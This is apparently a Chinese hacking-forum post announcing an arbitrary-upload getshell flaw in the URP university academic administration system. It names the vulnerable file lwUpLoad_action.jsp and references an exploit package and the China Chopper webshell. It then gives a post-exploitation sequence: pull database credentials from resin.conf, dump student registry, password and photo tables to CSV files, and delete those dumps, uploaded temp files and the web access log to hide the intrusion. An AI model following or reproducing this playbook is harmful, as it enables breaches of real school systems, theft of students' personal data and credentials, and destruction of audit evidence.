URP综合教务系统通杀getshell

本来在习科沙龙的时候，准备要放出这个0day，但是考虑到影响范围实在是太大了，所以为了慎重起见，我们打消了放出漏洞的念头。当看到wooyun既然已经有人发现了存在问题的地方，那么习科联创以技术研究为目的，经讨论决定，在wooyun没有公开处理漏洞之前，只对赏金猎人部分开放作为学习和研究的样本，也请广大赏金猎人自觉遵守习科联创的规章制度，请勿非法使用。
存在漏洞的文件为lwUpLoad_action.jsp，此漏洞发现者为习科联创核心成员zippo。
利用工具仅限赏金猎人使用，当wooyun将此事处理完毕后，我们会同步放出利用程序。

urp_upload.rar

然后resin下的conf里有个resin.conf，搜索database
/URP/webserver/resin-jw6/conf/ 

SELECT * FROM xs_xjb  --f:/tmp/xs_xjb.csv

SELECT * FROM code_jsb  --f:/tmp/code_jsb.csv

SELECT * FROM code_bjb  --f:/tmp/code_bjb.csv

SELECT * FROM code_zyfxb  --f:/tmp/code_zyfxb.csv

SELECT * FROM code_zyb  --f:/tmp/code_zyb.csv

SELECT * FROM code_xsb  --f:/tmp/code_xsb.csv

SELECT * FROM sys_yhmmb  --f:/tmp/sys_yhmmb.csv

SELECT * FROM xs_zpb  --f:/tmp/xs_zpb.csv

中国菜刀.zip

SELECT * FROM xs_xjb_view  --f:/tmp/xs_xjb_view.csv

rm /tmp/*.csv

rm /program/xfzzhjw/lwUpLoadTemp/*

rm /resin-3.0.27-2/logs/access.log